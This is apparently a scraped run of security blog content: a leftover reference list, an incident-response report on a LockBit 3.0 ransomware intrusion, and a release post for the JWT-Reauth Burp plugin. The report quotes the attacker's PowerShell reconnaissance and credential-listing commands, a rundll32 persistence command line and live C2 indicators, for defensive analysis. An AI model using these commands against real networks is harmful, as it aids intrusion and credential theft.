[1] Online Casino Roulette – A guideline for penetration testers and security researchers: https://research.nccgroup.com/2020/09/18/online-casino-roulette-a-guideline-for-penetration-testers-and-security-researchers/

[2] NCC Group Vulnerability Disclosure Policy: https://research.nccgroup.com/wp-content/uploads/2021/03/Disclosure-Policy.pdf

[3] Big Six – Wizard of odds: https://wizardofodds.com/games/big-six/

[4] Chi-squared distribution: https://en.wikipedia.org/wiki/Chi-squared_distribution

[5] Goodness of fit: https://en.wikipedia.org/wiki/Goodness_of_fit

[6] Chi Square Distribution Table for Degrees of Freedom 1-100: https://www.easycalculation.com/statistics/chisquare-table.php

[7] P-value – Wikipedia: https://en.wikipedia.org/wiki/P-value

[8] Confidence interval: https://en.wikipedia.org/wiki/Confidence_interval

[9] MultinomCI – Confidence Intervals for Multinomial Proportions: https://rdrr.io/cran/DescTools/man/MultinomCI.html

[10] Bootstrapping – https://en.wikipedia.org/wiki/Bootstrapping_(statistics)

[11] Monte Carlo – https://en.wikipedia.org/wiki/Monte_Carlo_method

Back in Black: Unlocking a LockBit 3.0 Ransomware Attack 

Authored by: Ross Inman (@rdi_x64)

Summary

tl;dr

This post explores some of the TTPs employed by a threat actor who was observed deploying LockBit 3.0 ransomware during an incident response engagement.

Below is a summary of the findings presented in this blog post:

  • Initial access via SocGholish.
  • Establishing persistence to run Cobalt Strike beacon.
  • Disabling of Windows Defender and Sophos.
  • Use of information gathering tools such as Bloodhound and Seatbelt.
  • Lateral movement leveraging RDP and Cobalt Strike.
  • Use of 7zip to collect data for exfiltration.
  • Cobalt Strike use for Command and Control. 
  • Exfiltration of data to Mega.
  • Use of PsExec to push out ransomware.

LockBit 3.0

LockBit 3.0, aka “LockBit Black”, was first noted in June of this year and has coincided with a large increase in victims being published to the LockBit leak site, indicating that the past few months have heralded a period of intense activity for the LockBit collective.

In the wake of the apparent implosion of previous prolific ransomware group CONTI [1], it seems that the LockBit operators are looking to fill the void; presenting a continued risk of encryption and data exfiltration to organizations around the world.

TTPs

Initial Access

Initial access into the network was gained via the download of a malware-laced zip file containing SocGholish. Once executed, it initiated the download of a Cobalt Strike beacon, which was created in the folder C:\ProgramData\VGAuthService with the filename VGAuthService.dll. Along with this, the Windows command-line utility rundll32.exe was copied to the folder, renamed to VGAuthService.exe, and used to execute the Cobalt Strike DLL.

PowerShell commands were also executed by the SocGholish malware to gather system and domain information:

  • powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; net group 'Domain Admins' /domain ; net group 'Enterprise Admins' /domain ; net localgroup Administrators /domain ; net localgroup Administrators ;
  • powershell /c Get-WmiObject win32_service -ComputerName localhost | Where-Object {$_.PathName -notmatch 'c:\\win'} | select Name, DisplayName, State, PathName | findstr 'Running' 

Persistence

A persistence mechanism was installed by SocGholish using the startup folder of the infected user to ensure execution at user logon. The shortcut file C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VGAuthService.lnk was created and configured to execute the following command which will run the Cobalt Strike beacon deployed to the host:

C:\ProgramData\VGAuthService\VGAuthService.exe C:\ProgramData\VGAuthService\VGAuthService.dll,DllRegisterServer
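As a defensive aid, this Startup-folder persistence can be triaged with a simple sweep. The sketch below is our own (not from the incident): it flags .lnk files in per-user Startup folders whose raw bytes reference ProgramData. Shortcut files embed their target path, so a byte search is usually sufficient for triage even without a full LNK parser:

```python
from pathlib import Path

# Per-user Startup folder, relative to each profile under C:\Users.
STARTUP = "AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup"

def suspicious_lnk_files(users_root: str = "C:/Users"):
    """Return Startup-folder shortcuts whose target appears to live in ProgramData."""
    hits = []
    for lnk in Path(users_root).glob(f"*/{STARTUP}/*.lnk"):
        # .lnk files embed their target path; ProgramData is an unusual
        # (though not conclusive) home for a logon-time executable.
        if b"ProgramData" in lnk.read_bytes():
            hits.append(lnk)
    return hits

for hit in suspicious_lnk_files():
    print(f"[!] possible persistence: {hit}")
```

Any hits would still need manual review, since legitimate software occasionally installs shortcuts pointing into ProgramData.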

Defence Evasion

Deployment of a batch script named 123.bat was observed on multiple hosts; it was deployed via PsExec. The script had the capability to uninstall Sophos, disable Windows Defender and terminate running services whose names contained specific strings. The contents of the batch script are provided below:

Figure1: 123.bat contents

The ransomware binary used also clears key Windows event log files including Application, System and Security. It also prevents any further events from being written by targeting the EventLog service.

Discovery

Bloodhound was executed days after the initial SocGholish infection on the patient zero host. The output file was created in the C:\ProgramData\ directory and had the file extension .bac instead of the usual .zip; however, the file was still a zip archive.
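Despite the renamed extension, the archive is still identifiable by its magic bytes. A minimal, illustrative check (the `looks_like_zip` helper is hypothetical) might look like:

```python
ZIP_MAGIC = b"PK\x03\x04"  # local-file header that begins ordinary zip archives

def looks_like_zip(path: str) -> bool:
    """Return True if the file begins with the zip local-file header,
    regardless of its extension (e.g. a Bloodhound .bac that is really a zip)."""
    with open(path, "rb") as f:
        return f.read(4) == ZIP_MAGIC
```

Content-based checks like this are a simple way to spot masqueraded staging archives during an investigation.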

A TGS ticket for a single account was observed on patient zero in a text file under C:\ProgramData\. It appears the threat actor was gathering TGS tickets for SPNs associated with the compromised user.

Seatbelt [2] was also executed on the patient zero host alongside Bloodhound. Security-oriented information about the host gathered by Seatbelt was written to the file C:\ProgramData\seat.txt.

Lateral Movement

The following methods were utilized to move laterally throughout the victim network:

  • Cobalt Strike remotely installed temporary services on targeted hosts which executed a Cobalt Strike beacon. An example command line of what the services were configured to run is provided below:

    rundll32.exe c:\programdata\svchost1.dll,DllRegisterServer
  • RDP sessions were established using a highly privileged account that the threat actor had previously compromised.

Collection

7zip was deployed by the adversary to compress and stage data from folders of interest which had been browsed during RDP sessions.

Command and Control

Cobalt Strike was the primary C2 framework utilized by the threat actor to maintain their presence on the estate as well as laterally move.

Exfiltration Using MegaSync

Before deploying the ransomware to the network, the threat actor began to exfiltrate data to Mega, a cloud storage provider. This was achieved by downloading Mega sync software onto compromised hosts, allowing for direct upload of data to Mega.

Impact

The ransomware was pushed out to the endpoints using PsExec and impacted both servers and end-user devices. The ransomware executable was named zzz.exe and was located in the following folders:

  • C:\Windows\
  • C:\ProgramData\
  • C:\Users\<user>\Desktop\

Recommendations

  1. Ensure that both online and offline backups are taken and test the backup plan regularly to identify any weak points that could be exploited by an adversary.
  2. Restrict internal RDP and SMB traffic so that only hosts that are required to communicate via these protocols are allowed to.   
  3. Monitor firewalls for anomalous spikes in data leaving the network.
  4. Block traffic to cloud storage services such as Mega where they have no legitimate use in the corporate environment.
  5. Provide regular security awareness training.

If you have been impacted by LockBit, or currently have an incident and would like support, please contact our Cyber Incident Response Team on +44 161 209 5148 or email [email protected]

Indicators of Compromise

IOC Value Indicator Type Description
orangebronze[.]com Domain Cobalt Strike C2 server
194.26.29[.]13 IP Address Cobalt Strike C2 server
C:\ProgramData\svchost1.dll C:\ProgramData\conhost.dll C:\ProgramData\svchost.dll File Path Cobalt Strike beacons
C:\ProgramData\VGAuthService\VGAuthService.dll File Path Cobalt Strike beacon deployed by SocGholish
C:\Windows\zzz.exe C:\ProgramData\zzz.exe C:\Users\<user>\Desktop\zzz.exe File Path Ransomware Executable
c:\users\<user>\appdata\local\megasync\megasync.exe File Path Mega sync software
C:\ProgramData\PsExec.exe File Path PsExec
C:\ProgramData\123.bat File Path Batch script to tamper with security software and services
D826A846CB7D8DE539F47691FE2234F0FC6B4FA0 SHA1 Hash C:\ProgramData\123.bat
Figure 2: Indicators of Compromise

MITRE ATT&CK®

Tactic Technique ID Description
Initial Access Drive-by Compromise T1189 Initial access was gained via infection of SocGholish malware caused by a drive-by-download
Execution Command and Scripting Interpreter: Windows Command Shell T1059.003 A batch script was utilized to execute malicious commands
Execution Command and Scripting Interpreter: PowerShell T1059.001 PowerShell was utilized to execute malicious commands
Execution System Services: Service Execution T1569.002 Cobalt Strike remotely created services to execute its payload
Execution System Services: Service Execution T1569.002 PsExec creates a service to perform its execution
Persistence Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder T1547.001 SocGholish established persistence through a startup folder 
Defence Evasion Impair Defenses: Disable or Modify Tools T1562.001 123.bat disabled and uninstalled Anti-Virus software
Defence Evasion Indicator Removal on Host: Clear Windows Event Logs T1070.001 The ransomware executable cleared Windows event log files
Discovery Domain Trust Discovery T1482 The threat actor executed Bloodhound to map out the AD environment
Credential Access Steal or Forge Kerberos Tickets: Kerberoasting T1558.003 A TGS ticket for a single account was observed in a text file created by the threat actor
Discovery System Information Discovery T1082 Seatbelt was run to gather information on patient zero
Lateral Movement Remote Services: SMB/Windows Admin Shares T1021.002 Cobalt Strike targeted SMB shares for lateral movement
Lateral Movement Remote Services: Remote Desktop Protocol T1021.001 RDP was used to establish sessions to other hosts on the network
Collection Archive Collected Data: Archive via Utility T1560.001 7zip was utilized to create archives containing data from folders of interest
Command and Control Application Layer Protocol: Web Protocols T1071.001 Cobalt Strike communicated with its C2 over HTTPS
Exfiltration Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 The threat actor exfiltrated data to Mega cloud storage
Impact Data Encrypted for Impact T1486 Ransomware was deployed to the estate and impacted both servers and end-user devices
  1. https://www.bleepingcomputer.com/news/security/conti-ransomware-finally-shuts-down-data-leak-negotiation-sites/
  2. https://github.com/GhostPack/Seatbelt

Tool Release – JWT-Reauth

25 August 2022 at 16:20

[Editor’s note: This post is a part of our blog series from our NCC Group summer interns! You can see more posts from consultants in our internship program here.]

When testing APIs with short-lived authentication tokens, it can be frustrating to log in every few minutes, taking up a consultant’s time with an unnecessary copy-and-paste task, as well as introducing the possibility of human error when copying across the token, which can further hinder testing.

Today we are releasing JWT-Reauth, a plugin that aims to provide a painless solution to this issue. JWT-Reauth gives Burp a way to authenticate with a given endpoint, parse out the provided token and then attach it as a header on requests going to a given scope.

The latest version of the plugin can be downloaded as a JAR file from the releases page on GitHub: https://github.com/nccgroup/jwt-reauth/releases/

Feature List:

  • Caches authentication tokens
  • Regex parsing for the token format
  • Custom authentication header via the UI
  • Functionality accessible via the send-to-extension context menu:
    • Setting the authentication request
    • Parsing a token from a specific request
    • Adding a URL to the scope
  • Adjustable token refresh time
  • Entire plugin can be configured then enabled to start attaching the header
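The token caching and adjustable refresh time in the list above can be modelled with a short sketch. This is not the plugin’s actual (Java) implementation; `TokenCache` and `fetch_token` are illustrative names:

```python
import time

class TokenCache:
    """Caches a token and re-fetches it once refresh_seconds have elapsed."""

    def __init__(self, fetch_token, refresh_seconds, clock=time.monotonic):
        self._fetch = fetch_token   # callable performing the auth request
        self._ttl = refresh_seconds
        self._clock = clock         # injectable for testing
        self._token = None
        self._fetched_at = None

    def get(self):
        now = self._clock()
        if self._token is None or now - self._fetched_at >= self._ttl:
            self._token = self._fetch()
            self._fetched_at = now
        return self._token
```

In the real plugin the refresh interval is set in the UI, and the cached token is what gets attached to in-scope requests.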

Example Usage:

This example will cover creating an authentication request in Postman, proxying it through Burp and adding that request to the plugin to be handled automatically.

Initially I like to set up my Burp proxy listening on 8081 as a personal preference. I can then set Postman to proxy through Burp from the settings tab:

Once everything is going through Burp, we create an authentication request in Postman:

Once you have a working request for getting an access token, you can go to Burp’s target tab, find the site and use the context menu to send it to the plugin as an auth request. Note: requests from the proxy history also have this context menu.

While we’re in the target tab, it would be nice to add the request to JWT-Reauth’s own scope, so we do that using the “Send to JWT-Reauth (add to scope)” option in the context menu:

This will then appear in JWT-Reauth’s scope tab. I have also enabled the “Prefix” mode, meaning it will match any request whose URL has this as a prefix. This is useful for including an entire site or subdirectory in the scope.

If we now navigate to the main plugin tab we will see the following:

JWT-Reauth has successfully used the authentication request to send a request of its own and parse the token out. To enable the substitution for proxied requests, we toggle the ‘not listening’ button to ‘listening’. If we now navigate to an in-scope URL we can see that the Authorization header is added:

Finally navigating back to the plugin we can see that it has cached the Authorization header for later use:

Alternative Uses

JWT-Reauth is also useful when using cURL, as it helps avoid having to embed and update long token credentials in commands.
The example cURL command below sends an authentication request through Burp using the --proxy option, enabling JWT-Reauth to reuse the request.

curl --request POST \
     --proxy 127.0.0.1:8081 \
     192.168.151.145:8080/auth_needs_post_data.php \
     --data "password=Password123"
{"access_token":"rVgzEQ9pAMU2vaDe5JBJtF3EhX9cVlhc0XGtUeElkGqSjsy7fC2XnHrS23vdULA41XlSY8McclN5dDXyO8Qh5yQv40RS3+2QDHrHVqqtT5mj4h261i\/WJQ89hn87V1im3AiubBsc4n8jTVa5qZq5tmXw9GXqaCx8jqkq21+UvqaGYInFrQA3sc8GLRfTVAHa+benVnZOGfqp\/ur6hOb79S4wTfoL8VoDT5OL+mkkIVxRebgEk6Cv+HkI5Uix7KgMA+MEH1IMfbdTPtVlHG1BOwuxrXmi1X00NRXXwwGfR6YCfwS9pXCLeegBj9M3dd+tEFyU4IROtk31Z48r4TfTpc3N70hcUKWvuzciNToIaTtN8qx78KSP9gGxgkzLHqlIjlHMSa6XZPrYkwN9"}
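The regex-based token parsing applied to a response like the one above can be sketched as follows. The pattern and helper names are illustrative only; the real pattern is user-configurable in the plugin’s UI:

```python
import re

# Example pattern: capture the access_token value from a JSON auth response.
TOKEN_RE = re.compile(r'"access_token"\s*:\s*"([^"]+)"')

def parse_token(body):
    """Extract the bearer token from an auth response body, or None."""
    m = TOKEN_RE.search(body)
    return m.group(1) if m else None

def auth_header(token):
    """Build the Authorization header JWT-Reauth would attach to in-scope requests."""
    return ("Authorization", "Bearer " + token)
```

A custom header name can be configured in the UI if the target API does not use the standard Authorization header.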

After JWT-Reauth has been configured, we can keep using cURL’s --proxy option instead of having to pass in the entire authentication header, and JWT-Reauth will handle the rest.

curl --request GET \
     --proxy 127.0.0.1:8081 \
     192.168.151.145:8080/
array (
  'Host' => '192.168.151.145:8080',
  'User-Agent' => 'curl/7.79.1',
  'Accept' => '*/*',
  'Connection' => 'close',
  'Authorization' => 'Bearer +7mXfg4WkDyu8ajEyZQCOPgDaH4N4UQgNF0puZzmEnwJI8pPKuJlL/AtWrUQqyPYXDKme4iFrFAq0woonGHrhcXh/cdeLK5G3GCmj6mj7pSn7dPJ+JqGugLouCgYAeLsN+E/88zPnPaIIls38tgUQ9sQxbFjb/nYcvRqFkJigQqwpXRcriGv1VKDT/fU8iCeoGbrlpJSl2hy7C+ReeZYQi1WMrBulCCzxyhGq0rVwQ1Ix1zxwt/wgN3DuXT7N6USiuZFMHWfzBvOj/Eo095zQ7sU4byMJB/YLFfxjzMOfaHmhHFWH4hoI9hOOEkJdXT/IUtRatWomya2F3ydWRd0vnNgrw1ZKh64ebWKxz+I2mUctXxmgQIE+gUqOnn5Y40azYt2V9P7g9rPeW89',
)

Summary

Overall I hope this plugin can be useful and save people some hassle. If you have any ideas for how to improve the plugin / features you would like to see, Issues and Pull Requests over on GitHub are very much appreciated!
https://github.com/nccgroup/jwt-reauth/issues
